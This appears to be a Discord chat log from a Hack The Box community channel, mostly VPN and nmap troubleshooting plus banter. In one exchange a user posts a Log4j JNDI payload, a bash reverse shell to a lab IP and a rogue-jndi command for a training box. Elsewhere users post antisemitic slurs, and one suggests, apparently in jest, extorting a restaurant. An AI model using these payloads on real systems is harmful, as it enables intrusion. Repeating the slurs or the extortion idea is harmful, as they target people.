from kali cmd
#general
fervent token
it is a cmd not an app
sudo openvpn /path
sudo openvpn /mnt/c/Users/xxxx/Downloads/vpnnamefile.ovpn
fervent token
ping the htb machine
what do you see on the open vpn kali windows? where you connected the vpn?
2026-04-05 12:22:22 OPTIONS IMPORT: tun-mtu set to 1500
2026-04-05 12:22:22 Preserving previous TUN/TAP instance: tun0
2026-04-05 12:22:22 Initialization Sequence Completed
2026-04-05 12:22:22 Data Channel: cipher 'AES-256-CBC', auth 'SHA256', peer-id: 31, compression: 'lzo'
2026-04-05 12:22:22 Timers: ping 10, ping-restart 120
2026-04-05 12:22:22 Protocol options: explicit-exit-notify 1, protocol-flags cc-exit tls-ekm dyn-tls-crypt
swift canyon
the command I ran was sudo openvpn then machine eu ip
fervent token
send me the path here please
fervent token
hmm
with kali you need mnt
most surley you entered the path wrong. I did that too
send the path here please
swift canyon
ok
terse dirge
how do I check if I am connected tho?
ifconfig | grep "10"
swift canyon
`ifconfig | grep "10"`
and what does this do?
terse dirge
@swift canyon What VPN do you have downloaded and what lab are you trying to access?
terse dirge
and what does this do?
Runs if config then grabs everything with 10 from the command output
sturdy thistle
Finall a nice machine for it
swift canyon
Runs if config then grabs everything with 10 from the command output
just a random ctf
trying to connect first
terse dirge
https://app.hackthebox.com/challenges/Secure%2520Notes?tab=play_challenge
You don't need an HTB VPN for challenges but for all other labs you need the appropriate VPN
fervent token
send the path here man. I will send you something
swift canyon
send the path here man. I will send you something
its just /desktop
fervent token
right click copy path. because desktop is in users in c
swift canyon
aa
terse dirge
Also you can't run HTB VPNs in the pwn box and don't need to run them on the pwn box to access stuff.
swift canyon
You don't need an HTB VPN for challenges but for all other labs you need the app...
ahh I see
Im a bit lost on what to do then
terse dirge
You also don't need to run nmap or ping on challenges
Once the challenge has spawned you should be able to access it
swift canyon
right click copy path. because desktop is in users in c
'/home/kali/Desktop/machines_eu-2.ovpn'
fervent token
sudo openvpn /mnt/home/kali/Desktop/machines_eu-2.ovpn
sudo ip route flush cache
sudo killall openvpn
first go with the kill and flush
is it showing you 2026-04-05 12:47:54 Initialization Sequence Completed
terse dirge
https://klipy.com/gifs/sixseven-six
sturdy thistle
hollow iris
who cares
sturdy thistle
We
swift canyon
sudo openvpn /mnt/home/kali/Desktop/machines_eu-2.ovpn
Options error: In [CMD-LINE]:1: Error opening configuration file: /mnt/home/kali/Desktop/machines_eu-2.ovpn
Use --help for more information.
fervent token
without mnt
swift canyon
same
swift canyon
Options error: In [CMD-LINE]:1: Error opening configuration file: home/kali/Desktop/machines_eu-2.ovpn
Use --help for more information.
sturdy thistle
Do u use WSL or VM?
terse dirge
What is bro doing?
sturdy thistle
Your path is wrong
swift canyon
Do u use WSL or VM?
I am on avm
sturdy thistle
But this is general, go to #1024429874246590575
sturdy thistle
How is u Ceald
sturdy thistle
I didnβt spoke to you
sturdy thistle
I will just ignore you and thatβs it for me
warm ravine
I didnβt spoke to you
Oh?
hollow iris
work bro
warm ravine
How is u Ceald
Did u mean me
sturdy thistle
Did u mean me
I meant @terse dirge
warm ravine
I meant <@733485715505152040>
sturdy thistle
But how r u
ornate ibex
11.11 anyone superstitious abt the number?
fervent token
I am on avm
functioning?
hollow iris
https://giphy.com/gifs/matt-darkviperau-darkviper-d3jwNXJ7UhW4t1rbsD
can u give them
?
like what is this sh
ornate ibex
no, u have to rank up
turbid goblet
Or buy VIP+
i think
I saw a noob rank post an embed
Just pay to win like i did
safe terrace
I have a question about machine called facts in the seasons box
hollow iris
I have a question about machine called facts in the seasons box
idk
safe terrace
I got access to root and found the user flag with the root flag and when i submitted them they are wrong
hollow depot
safe terrace
Thank u
upbeat tangle
i actually dont care, you all are still beautiful
jagged storm
no one has his/her face as pfp
I do
jagged storm
turbid goblet
ok bye thank you for ur obsevartion
left haven
Can someone ask stupid question to fuel the chat
turbid goblet
Can someone ask stupid question to fuel the chat
how are you
left haven
Oh i see i already ask haha
crude nest
You all are beautiful
You are beautiful too and very special β€οΈ
jagged storm
Can someone ask stupid question to fuel the chat
Does metroid shoot from a gun on his arm, or in his hand?
humble bobcat
signal mica
Does metroid shoot from a gun on his arm, or in his hand?
Change the world
My final message
fervent token
who got stuck on garfield?
remote bolt
west venture
https://tenor.com/view/he-gone-dead-hella-dead-gif-20116498
rat please π
Why are you not the moderator
jagged storm
Why are you not the moderator
I left lol
west venture
But why π
jagged storm
Traumatic brain injury
west venture
Damn I'm sorry didn't know
jagged storm
No, it's fine. No damage. Not only treatable, but curable. I am doing well, and back to my shitposting
west venture
Nice
jagged storm
But I'd have to climb back up to moderator again
hollow iris
hi
west venture
Oh
jagged storm
And honestly, I don't want to lol
jagged storm
You can just go snag community contributor, do well, and move up to mod
ornate ibex
And honestly, I don't want to lol
||how could u say no to the power||
turbid goblet
wait rat u were a mod before?
ornate ibex
u cannot, I will be immune
jagged storm
||how could u say no to the power||
I can't be as active as I was before
Though, mods are pretty sparse these days lol
hollow iris
||how could u say no to the power||
on the
hacktheboxserver
π
this ain that serious
jagged storm
wait rat u were a mod before?
For a long time lol
hollow iris
For a long time lol
long long time ago
...
their was a modrator
in the hackthebox server
π₯
jagged storm
I used to basically live in the CPTS channel
heady sage
I used to basically live in the CPTS channel
This is true
west venture
I used to basically live in the CPTS channel
I used to live in you
heady sage
I used to live in you
π³οΈβπ
west venture
π³οΈβπ
I am straight
bronze lion
Btw @west venture , vader is a girl
hollow iris
I am straight
respect
hollow iris
Btw <@1318739132062761012> , vader is a girl
then he dont deserve vader in da name
jagged storm
then he dont deserve vader in da name
She can use any name she wants
west venture
Btw <@1318739132062761012> , vader is a girl
Why are you telling me this?
snow wraith
hollow iris
Why are you telling me this?
some resistence did not stop anyone if u ask me
heady sage
Why are you telling me this?
It was more of a joke than anything
bronze lion
Why are you telling me this?
Cuz we both know it's not an appropriate joke to tell a female
hollow iris
πΏ
heady sage
Sorry about that
bronze lion
Sorry about that
So who got blocked?
hollow iris
me
west venture
Cuz we both know it's not an appropriate joke to tell a female
I was saying that to rat
heady sage
The dumbass transphobe who kept trying to reply to me
hollow iris
The dumbass transphobe who kept trying to reply to me
well well well
i am not scared
i am discusted
turbid goblet
????????????????????????????/
west venture
The dumbass transphobe who kept trying to reply to me
I had like zero context i just come here say some shit and leave
jagged storm
<@&861185840277487616>
hollow iris
huh ?
bronze lion
i am discusted
I don't think this is a real word
hollow iris
yeah
jagged storm
i am discusted
They deleted another message. Check the logs and escort them out
west venture
Who said what?
hollow iris
and a houthi
turbid goblet
yeah im a nazi
bronze lion
Lol
hollow iris
ok
west venture
My first time pinging serous rule break
bronze lion
ban free speach
Keep yapping bro
turbid goblet
speach
hollow iris
jews
hollow iris
Keep yapping bro
alr jew
west venture
ban free speach
Yeah this server is not ruled by a democratic system
hollow iris
he did n othing wrong debate me in dm
west venture
So shut up
turbid goblet
didnt take long for the moron thoughts to come out
hollow iris
Yeah this server is not ruled by a democratic system
jewish*
hollow iris
didnt take long for the moron thoughts to come out
alr
bronze lion
he did n othing wrong debate me in dm
Ph we have so many good things to do rather than debate kids like u bro
hollow iris
Ph we have so many good things to do rather than debate kids like u bro
im older than u jew
jagged storm
im older than u jew
remote bolt
i am interested in buying the hackthebox platform/website.
my offer is 500euro and i can pay it in 10months every month 50euro
i want to be the owner of the website
bronze lion
im older than u jew
So?
I did not call u a kid bcz of ur age
west venture
Bro server the left
bronze lion
i am interested in buying the hackthebox platform/website.
my offer is 500euro a...
Lol
remote bolt
is it possibru ?
west venture
No shut up
remote bolt
ok
west venture
You're stupid
bronze lion
Bro server the left
Either way after an hour he would have met the same fate
bronze lion
You're stupid
Chill candy
remote bolt
@west venture nobody asked ur opinion
bronze lion
is it possibru ?
I know it's a joke and it was good
west venture
I can state my opinion which is you're stupid
bronze lion
<@1318739132062761012> nobody asked ur opinion
Yo chill
Don't start an argument now
Waot
Wait
ornate ibex
scoot
west venture
And my opinion is a fact
ornate ibex
Bye
remote bolt
@west venture sup internet gangster
bronze lion
Have fun arguing
ornate ibex
do it carefully @bronze lion
crude nest
Can someone ask stupid question to fuel the chat
you are missing the action
jagged storm
Action is over now
remote bolt
keyboard warriorsz
west venture
Action is over now
Not if he says something more
turbid goblet
im getting the feeling he will
west venture
Uhh
ornate ibex
Not if he says something more
I'd like to say that egg came first and then chicken
west venture
Okay?
bronze lion
do it carefully <@1347025101480263821>
Roger that cap
heady sage
yeah im a nazi
Know your fucking place trash
jagged storm
u just added kitty behind it
west venture
I'd like to say that egg came first and then chicken
Yes the egg came first
west venture
<@1318739132062761012> ur name is stolen from the real 0day
What's the real 0day?
ornate ibex
<@1318739132062761012> you're stupid
stop pulling his legs
remote bolt
@ornate ibex if he calls me stupid i can call him stupid
west venture
I called you stupid because you ARE stupid
ornate ibex
bruh stop the crap
jagged storm
remote bolt
@west venture where does the egg come from stupid
swift canyon
if u respond to my question u stupid
respond
west venture
<@1318739132062761012> where does the egg come from stupid
The chicken
remote bolt
u stupid
jagged storm
We really gonna have another crash out
ornate ibex
and I think I started it π’
remote bolt
@west venture do i look like i care about rank ?
heady sage
west venture
<@1318739132062761012> do i look like i care about rank ?
No bc you're too dumb to actually do it
ornate ibex
I'll assume both of you are messing around. When you both start to hurt each other plz walk away like a gentlemen
west venture
Also discord has a reply feature
remote bolt
@west venture u don't even know what my main account is stupid
west venture
You don't have to ping my name every time you reply
turbid goblet
lmao the real let the men fight
remote bolt
@west venture
west venture
^ proof of stupidity
remote bolt
@west venture
remote bolt
@west venture ban me kick me perm ban me
west venture
Okay
jagged storm
Yk I am a moderator right?
Impersonating staff is actually against the rules
west venture
Oh
west venture
Impersonating staff is actually against the rules
Well if he's not stupid, he'd know a moderator has a green shield
remote bolt
@west venture better delete it cuz u are scared to get caught and then u'll cry in a corner
remote bolt
@west venture do i also need to put a profile picture ?
ornate ibex
Final warning before I timeout both of u.
remote bolt
Final warning before i timeout all of u.
jagged storm
Don't do it
west venture
Final warning before I timeout both of u.
remote bolt
im gonna go do some biceps exercises ciaoo
ornate ibex
good
remote bolt
@west venture stupid
west venture
^timeout
jagged storm
<@1318739132062761012> stupid
ornate ibex
u shud have done the bicep workout.
vivid shoal
Is the streak system bugged? Says im 30/0 points and the little fire icon isn't lit up
ornate ibex
reach out to the support
west lynx
jagged storm
Where's my progress bar???
Where did you leave it last?
west venture
Where did you leave it last?
In the website
crude nest
Is the streak system bugged? Says im 30/0 points and the little fire icon isn't ...
every sunday the same. it resets on monday, the visual bug is there since years
vivid shoal
Oh gotcha thanks. I guess I never looked on sunday.
scenic maple
oh tejas took care of it
jagged storm
There were two
humble bobcat
https://academy.hackthebox.com/achievement/752428/path/17
CONGRAAATTSSSS
ornate ibex
Thanks π
humble bobcat
deserved
rose onyx
Thanks π
Wen test? Today?
scenic maple
Not so soon
when?
rose onyx
Not so soon
pffft.....
ornate ibex
Before 30 June.
scenic maple
lets lock on 29 june?
ornate ibex
No, get certified before 30 June.
rose onyx
lets lock on 29 june?
Or ban
jagged storm
lets lock on 29 june?
golam, where is your certs
ornate ibex
so, I shud attend more than 2 weeks
sick gate
golam, where is your certs
Golam is pretending to be technically unskilled
humble bobcat
π°
scenic maple
golam, where is your certs
i have 4 more months for this years cert
ornate ibex
This.
scenic maple
tejas you have to start at june 1
or u might be late
so?
speaking of i will finish the path today or tomrrow
sick gate
tejas you have to start at june 1
There's actually fifteen public holidays in June
rose onyx
speaking of i will finish the path today or tomrrow
Get you exam done before tejas or ban
scenic maple
gotta refactor the notes
jagged storm
Get you exam done before tejas or ban
The pact has been made
scenic maple
Get you exam done before tejas or ban
lets do whoever gets most flags
gets not banned
ornate ibex
tejas you have to start at june 1
Thank you. I was tryna figure that complex math 
rose onyx
lets do whoever gets most flags
No, who is first
rose onyx
but 3 month deadline for me
You have to be better than Tejas, you are the chosen one
scenic maple
ok so
i have to get cwes in 3 months
i have to either get equal or more flags than tejas
if not i get banned
deal?
turbid goblet
im putting a bet on kalshi golem vs tejas
jagged storm
πΈ
turbid goblet
get ur bets in
humble bobcat
i think banned is too soft
jagged storm
Ritualistic scaphism
humble bobcat
good ideas
jagged storm
Is that the boat torture
The very same
sick gate
Yep I vote for that one
humble bobcat
me too
ornate ibex
I'll have to practice a lot, I feel. Hopefully, I make it in the first attempt.
humble bobcat
good luck
ornate ibex
Thanks
turbid goblet
arnt there writeups?
if not i can just send you mine
actually mine arrnt good for learning
scenic maple
I'll have to practice a lot, I feel. Hopefully, I make it in the first attempt.
send me the flags thnx
ornate ibex
send me the flags thnx
ukw? @sturdy thistle is clever enough that he'll spot that u cheated. and ban u
ornate ibex
and also me
scenic maple
jk lmfao
turbid goblet
dm me
molten bobcat
Good morning
next pumice
i am not used to discord
molten bobcat
Hallo, the starting point has uhh
next pumice
and used youtbe
jagged storm
so how do we not get detected
Just encrypt them first with rot26
scenic maple
Just encrypt them first with rot26
rot0 more efficient
next pumice
as said in writeup
molten bobcat
So I'd like to pause for a moment
Encryption and encoding are two different things
Big important
next pumice
oh i'll try with rot13 now
jagged storm
Encryption and encoding are two different things
molten bobcat
Base64 is an encoding, not an encryption. It's like speaking another language you can undo it
scenic maple
https://tenor.com/view/erm-aksuali-veli-vel-nerd-nerd-emoji-gif-1190843531651562...
lol i was thinking the same but he helping
west venture
You can also undo encryption
west venture
What form of transformation or representation of data CANNOT you undo?
next pumice
but the official writeup doesn't mention use of rot13
west venture
Yup
jagged storm
What form of transformation or representation of data CANNOT you undo?
Hashing
molten bobcat
Yay I know things look at me go
next pumice
my brother then what should i do
sick gate
What form of transformation or representation of data CANNOT you undo?
Hammer smash
Burning
Pulping
molten bobcat
Gibe me uno moment
jagged storm
Yay I know things look at me go
But can you see why kids love cinnamon toast crunch
molten bobcat
I'm reading the writeup
sick gate
Nuclear bomb
west venture
my brother then what should i do
What is your issue exactly?
next pumice
tier 2 unified starting point
turbid goblet
use burp
next pumice
i uploaded the payload using burpsuit
turbid goblet
and u got what
sturdy thistle
ukw? <@226223176269561857> is clever enough that he'll spot that u cheated. and ...
We can ban him before taking exam
next pumice
and also got the Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
but it is not connecting to nc
molten bobcat
Can you copy paste me your payload before you base64 encode it friend?
molten bobcat
It's your subnet ip
turbid goblet
its not ur public ip lol
jagged storm
Maybe he's using his real IP
molten bobcat
Its not unsafe to share private IP addresses lol
west venture
it has my IP
Not really dangerous
molten bobcat
I'm trying to make sure you wrote your own IP and not the one from the writeup
Lol
turbid goblet
oh i lied u do get a shell in this
west venture
HTB doesn't have forwarding between the VPN clients right?
turbid goblet
this is from my writeup
next pumice
${jndi:ldap://{ tun0 }:1389/o=tomcat}
west venture
Like if I am connected to the same subnet as you, can I ping you?
next pumice
this is what exactly my screen looks like but i am not connecting to nc
west venture
this is what exactly my screen looks like but i am not connecting to nc
Wait are you trying to exploit the Log4j vulnerability?
jagged storm
Cyberchef mentioned
molten bobcat
It starts with log4j yeah
next pumice
echo 'bash -c bash -i >&/dev/tcp/10.10.15.245/4444 0>&1' |
base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMjQ1LzQ0NDQgMD4mMQo=
next pumice
Wait are you trying to exploit the Log4j vulnerability?
yes
next pumice
i did it in terminal
just copy pasted what writeup said ( Trust me i did not wanted to cheat
turbid goblet
writeups arent cheating if ur learning
jagged storm
just copy pasted what writeup said ( Trust me i did not wanted to cheat
It's starting point - no worries
west venture
Wait if my understanding about the whole log4j thing is correct, should you not host a malicious java Library on your ldap server??
Idk
Without a bash reverse shell
next pumice
i have
molten bobcat
Oh I think I see your issue sir
next pumice
rohue jndi
tight kindle
Wait if my understanding about the whole log4j thing is correct, should you not ...
the rogue-jndi runs both an ldap and http server. both malicious
west venture
yeah it's not bash I think
west venture
You gotta create the reverse shell inside the java Library
molten bobcat
That command
Is designed to spit out the base64 encoded command
In the terminal
That's why it echos
next pumice
ββ[eu-starting-point-2-dhcp]β[10.10.15.245]β[htb-mp-2518939@htb-kzu8rdkw10-htb-cloud-com]β[~/rogue-jndi]
ββββΌ [β
]$ java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMjQ1LzQ0NDQgMD4mMQo=|{base64,-d}|{bash,-i}" --hostname "10.10.15.245"
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.15.245:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.15.245:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10.10.15.245:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.15.245:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://10.10.15.245:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.15.245:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://10.10.15.245:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.15.245:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
Sending LDAP ResourceRef result for o=tomcat with javax.el.ELProcessor payload
molten bobcat
See what I mean?
tight kindle
i did it in terminal
can you try doing it in Burp. I remember being stuck here as well because I was doing it with Curl
west venture
the rogue-jndi runs both an ldap and http server. both malicious
Oh
jagged storm
Oh starting point has you go that far? I would have expected it to be the easiest possible stuff
molten bobcat
Starting point has updated a time or two since I've done it
jagged storm
I would think like some boot to root stuff, or suid stuff
west venture
DM me
molten bobcat
You're echoing the base64 encoding...
I'm not doing this, the writeup is
And yes, it's a command intended to show the payload being base64 encoded
next pumice
how to dm
west venture
Yeah so you need to have your bash reverse shell be executed by the java class file
tight kindle
can anobody help with the Kobold machine. Been stuck at PrivEsc since yesterday.
next pumice
i have sent the screenshot the gentleman who asked me to DM
molten bobcat
Nice nice
jagged storm
This is kinda par for general. Maybe #starting-point . Not sure if there is image perms there
small osprey
All good. seems jokes only apply for some.
molten bobcat
tight kindle
<#706656410376732802>
nobody answers there. full of ghosts
jagged storm
nobody answers there. full of ghosts
molten bobcat
All good. seems jokes only apply for some.
Not really I was just asking that we not troll the fella getting help on something he stuck with
Other than that it's back to our regularly scheduled clown posting
I fixed my vps
I'm very happy about it
jagged storm
Other than that it's back to our regularly scheduled clown posting
How are you cloud
molten bobcat
I'm good!
My diet has been helping me a lot
Significantly less misery in my life
jagged storm
Today's always good
jagged storm
It's the worst day to be homeless. Everything is closed lol
I could potentially relocate, but not until my medical situation is done.
But I'm in a good spot to shiny up the resume first. I think I'll finish maldev academy, and grab both CRTO I and II
I think I can knock it all out in 5 months
I was looking at OSEP and OSED, but between the price and the stuff I didn't want to do, neither fit right
I really need CS experience, so I want that CRTO
OSED looked interesting, but i feel like my maldev academy already goes beyond the stuff I'd like from it, and I'm not all that interested in the binary exploitation
How far are you in osep?
It still 24 hours?
Ah
inland lantern
go for it
jagged storm
Does it not have much web?
jagged storm
The new cert
inland lantern
this one π
jagged storm
I was looking at the CRTO exam structure, and was sad that there is no report portion. After the beast that was the CPTS report, I felt ready for anything, and there's just nothing.
Nope. You get scored on two things - flags and opsec
Alerts hurt your score
You can also pause your exam time
I think the first exam is basic AV evasion
Second one is more advanced
But you have to use cobalt strike, which they give you during it
west venture
Please
jagged storm
It's like the only way to get cobalt strike experience without working somewhere that has it first lol
fitgirlcobaltstrike
I'm building my project for havoc
I don't like it either lol
Because sliver is filthy go
worthy cargo
Happy good morning
I'm so happy today that I woke up
I could have just as easily not woken up
Another beautiful day in the life
I must go poo now
west venture
I wish to never waken up
jagged storm
I wish to never waken up
Wish granted. You can never sleep again
west venture
I wish to become unconscious, completely bypassing sleep
turbid goblet
if there is no physical health toll to that wish i want it too
i could accomplish so much more if i never needed to sleep
jagged storm
if there is no physical health toll to that wish i want it too
They monkeys paw has no mercy
turbid goblet
static bloom
i could accomplish so much more if i never needed to sleep
yes, but you could just always stay up as long as you possibly can and then go to sleep when you physically can't study anymore/do what you wanted to accomplish
jagged storm
So that I can never wake up
Wish granted. You're now eternally dreaming what you would have lived anyway.
turbid goblet
good sleep affects memory
static bloom
realistically it's probably going to have an effect on you possibly dying earlier, but none of us know when that is going to happen
west venture
realistically it's probably going to have an effect on you possibly dying earlie...
If you stay awake for long you will die
Typically within a month
static bloom
how long are we talking? -- i'm guessing you meant staying awake for a month, probably yeah
jagged storm
I don't think anyone has gone without sleep for more than like 10 days
turbid goblet
Some might say that sleep is the most important hacker skill
fleet rose
Some might say that sleep is the most important hacker skill
they know what they talking about
jagged storm
Some might say that sleep is the most important hacker skill
Others argue pizza
heady sage
My mom is googling the 67 meme
zealous charm
heady sage
Dear god
jagged storm
My mom is googling the 67 meme
zealous charm
https://tenor.com/view/oh-no-cringe-mexican-cat-cringe-gif-4559101190015770860
el cringo
static bloom
My mom is googling the 67 meme
did you initiate her googling by doing it?
jagged storm
This is a fair question
heady sage
did you initiate her googling by doing it?
No
static bloom
good. i was about to say I hope the answer is no π
mystic patio
Six seven!
azure remnant
Hi im kevin
turbid goblet
almost heaven. west virginia, blue right mountain!
rugged dune
bruh
azure remnant
Braaaaaah u broke it
rugged dune
salut la monde
azure remnant
La fishe la chocolat
rugged dune
les baguette
azure remnant
Uvevweve
scenic maple
does any kind sould have eyewitness installed
azure remnant
Ive it installed
turbid goblet
i do
azure remnant
Lemme recall
turbid goblet
i think it was just on kali
azure remnant
Ive it on kubuntu
scenic maple
lmao rip
jagged storm
how tf did u install it
That's the one that takes screenshots of everything, right?
scenic maple
yeah
azure remnant
Im using an alias pointing to Eyewintness.py
scenic maple
i am 90% sure this will be useless in the exam but i am gatekept on the module question
jagged storm
I had issues as well, if I remember. I think it also only works with chrome?
scenic maple
yeah but i gotta install it first
azure remnant
Theres Aquatone too
turbid goblet
use gowitness instead https://github.com/sensepost/gowitness
jagged storm
I hated it, and skipped
azure remnant
Ive had both give different results though
alpine pumice
imagine using chromium based browsers
scenic maple
well i am gonna read the source code to find out
modern problems need modern solutions
jagged storm
I get why you would use something like that in real life, but I'd rather manually do it unless it's a whole lot
azure remnant
so whats the name of the db file <:waz:1424888525202915403>
Aquatone has a fixed one
scenic maple
ye that one worked
azure remnant
Maybe the opposite
azure remnant
cause it might spoil module
Ah yes the module thing
Fbi open up
"whats wrong"
-WHATS WRONG ?
"shows discord chat"
-THIS IS FNG WRONG
jagged storm
hardy frigate
Cant believe how bad the new UI is for academy
U cant even start a new section in a new tab
jagged storm
https://tenor.com/view/tmnt-master-splinter-we-have-no-time-for-this-scientific-...
But if you never take time, how can you have time?
azure remnant
I aquire more time by wasting others' people time so i win
upbeat tangle
Is there a problem login the website?
scenic maple
both works for me
young glen
π
rugged dune
wtf
i thought it was a joke
i submitted user flag now in root and it was accepted
β οΈ
young glen
i submitted user flag now in root and it was accepted
Congratulations
upbeat tangle
both works for me
i have to login in a incognito window because no matter what i do doesnt work xD
browser magic
quaint sun
someone else was asking about the PJQ180 error earlier
upbeat tangle
someone else was asking about the PJQ180 error earlier
that was me
swift canyon
any1 knows why it doesnt let me scan a target machine ip on a starting point
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
I can ping the ip
but cant scan it
devout sail
Cmd?
quaint sun
any1 knows why it doesnt let me scan a target machine ip on a starting point
What exact command are you running to scan?
swift canyon
What exact command are you running to scan?
nmap -sV
swift canyon
You want help yet are soo lazy to respond ποΈποΈ
bro what
thats the command
turbid goblet
lmao
molten bobcat
So that's not sufficient
turbid goblet
good luck
quaint sun
You need to target the IP in an Nmap scan.
nmap -sV <ip>
swift canyon
So even with the IP you get nada?
yea
molten bobcat
Gotcha, so nmap does take a while it's not instant
devout sail
And it takes some time
Not too long tho
swift canyon
Gotcha, so nmap does take a while it's not instant
yeah but it says 0%
imma wait a bit ig
devout sail
yeah but it says 0%
Click any button, it will give update on how much is completed
Dont click the power button tho
swift canyon
Click any button, it will give update on how much is completed
yeah I usually do up arrow key
but it stays at 0%
turbid goblet
i feel like thats not efficient anyways
quaint sun
If you still have trouble, add -v or -vv (double verbose) to troubleshoot
turbid goblet
find open ports before u run version or scripts against it. if its probing version for every port its gonna be slower
devout sail
Or do without any flags first
quaint sun
Yeah that too
turbid goblet
or use rustscan bc rustscan is goated
rustscan -a {ip} --ulimit 5000 -b 500 -- -A -Pn
swift canyon
Nmap scan report for 19.129.71.180
Host is up (0.00071s latency).
All 1000 scanned ports on 19.129.71.180 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
devout sail
I usually go with
sudo nmap -sC -sV -vv IP
Never really had to wait for more than a min
Don't use rustscan yet, learn the nmap properly first
swift canyon
Nmap scan report for 19.129.71.180
Host is up (0.00071s latency).
All 1000 scann...
thats with the normal scan
turbid goblet
Don't use rustscan yet, learn the nmap properly first
actually true, just do nmap module
analog perch
@eager sedge Issue resolved with Kali. Thanks!
swift canyon
just nmap then ip
quaint sun
I usually go with
sudo nmap -sC -sV -vv IP
Never really had to wait for more th...
I can hear ippsec speaking this command in my head
devout sail
thats with the normal scan
Do this
sudo nmap -p- IP --min-rate=10000 (not a good command to use but quick check of all port)
devout sail
I can hear ippsec speaking this command in my head
Yep hehe
lime bone
I can hear ippsec speaking this command in my head
this gives things like the ttl
quaint sun
swift canyon
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.10 seconds
sturdy thistle
Either reach out to support or ask in #1024429874246590575
told it before this is general
swift canyon
young glen
upbeat tangle
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn...
Are you connecting to the same vpn as the machine
swift canyon
I just think that 1 machine was broken tbh
swift canyon
Are you connecting to the same vpn as the machine
yeah everything was good
works fine on another machine
alpine pumice
yeah everything was good
scenic maple
Ask for box help in <#706656410376732802> and module help in <#77404026327859204...
yo are instances spawning for u?
worthy cargo
I got lamb shank and rice and garlic sauce
fleet rose
Thoughts on using arch linux for cybersecurity anyone?
jagged storm
Thoughts on using arch linux for cybersecurity anyone?
fleet rose
https://tenor.com/view/what-happened-what-happened-to-you-as-a-child-what-kind-o...
πππ
worthy cargo
Kali already comes with it
fleet rose
I use parrot as of now
worthy cargo
I don't want to have to do a lot of work on a distro/OS setup
I need something that alrady have all
minimal configs on my part
fleet rose
Although i did try to set up blackarch but a lot of tools having trouble ti be installed
worthy cargo
minimal work on my part
fleet rose
So parrot and kali does the work u say
worthy cargo
Yes
jagged storm
Is blackarch even still maintained
fleet rose
Is blackarch even still maintained
No idea
Didnt check that one
But it did install a fair amount of tools
young glen
Is blackarch even still maintained
Good question
fleet rose
I think the repository is mostly maintained , as for the ISO im not sure
young glen
Itβs good as bootable distro but there are permanent install options as well
west venture
Thoughts on using arch linux for cybersecurity anyone?
fleet rose
https://tenor.com/view/xander-jeanneret-relics-and-rarities-dungeons-and-dragons...
certainly me experimenting with distros
young glen
Hannah Montana Linux
fleet rose
Hannah Montana Linux
i heard that one
west venture
Which is perfectly usable
fringe viper
Hellooo
west venture
The biggest misunderstanding begginers get Is thinking Linux distros are different operating systems
fringe viper
i tried reporting a vuln through responsible disclosure and i got shot down??
fringe viper
The biggest misunderstanding begginers get Is thinking Linux distros are differe...
what would you do if you found a bug in a major restaurant POS app ?
fringe viper
https://tenor.com/view/then-i-flip-then-on-the-black-market-black-market-illegal...
lmao
fringe viper
https://tenor.com/view/then-i-flip-then-on-the-black-market-black-market-illegal...
i mean you couldnβt really make money off it,just cause the restaurant losses
west venture
Use it as leverage to extort money
jagged storm
i tried reporting a vuln through responsible disclosure and i got shot down??
Was the restaurant participating in a bug bounty program
fringe viper
Was the restaurant participating in a bug bounty program
nah
jagged storm
So what you did is called a crime
west venture
π
alpine pumice
yikes
fringe viper
i didnt exploit it
west venture
Still
jagged storm
You don't have to, for it to be a crime
alpine pumice
big yikes
alpine pumice
"i had the bank owner with me when i robbed the bank"
jagged storm
Cool motive. Still crime.
jagged storm
fringe viper
https://tenor.com/view/liar-liar-jim-carrey-fletcxher-reede-stop-breaking-the-la...
IM SORRY
jagged storm
Use a proper bug bounty or vdp
Or don't complain when you get shot down, or wind up in federal prison
fringe viper
Use a proper bug bounty or vdp
they dont have a vdp
west venture
Well the least you can do now is double down and threaten to cause massive losses to the restaurant unless they pay you a monthly fee....
Yk what they say
jagged storm
they dont have a vdp
west venture
If you commit a crime, go all the way
fringe viper
https://tenor.com/view/cat-zone-of-zone-out-cat-cat-zoned-out-zoned-out-cat-gif-...
im genuinely confused as to what youre supposed to do if they dont have a VDP
jagged storm
im genuinely confused as to what youre supposed to do if they dont have a VDP
You do not test them
That's this thing called illegal
fringe viper
You do not test them
ok let me give you more context
jagged storm
ok let me give you more context
I'm good. Discussing this is against the rules
jagged storm
Mods should already boot you lol
west venture
Well since the owner ignored you, you definitely did earn the rights to go and call him stupid to his face
west venture
Or don't complain when you get shot down, or wind up in federal prison
But I truly don't understand the mindset of people completey shooting down these.
devout sail
Or don't complain when you get shot down, or wind up in federal prison
No hospital?
jagged storm
But I truly don't understand the mindset of people completey shooting down these...
People probably assume it's a scam
west venture
Like why get mad and be all egoistic and not care about it, and risk someone actually exploiting the vulnerability next time
fringe viper
Like why get mad and be all egoistic and not care about it, and risk someone act...
thats what i was thinking
fringe viper
i got a call from their security team and she sounded annoyed
fringe viper
But lawfully they can do whatever they want
anyways what kinda hacking are you into?
alpine pumice
Better hope they don't press charges
rancid snow
usually its either paper mail or they randomly show up to collect you
west venture
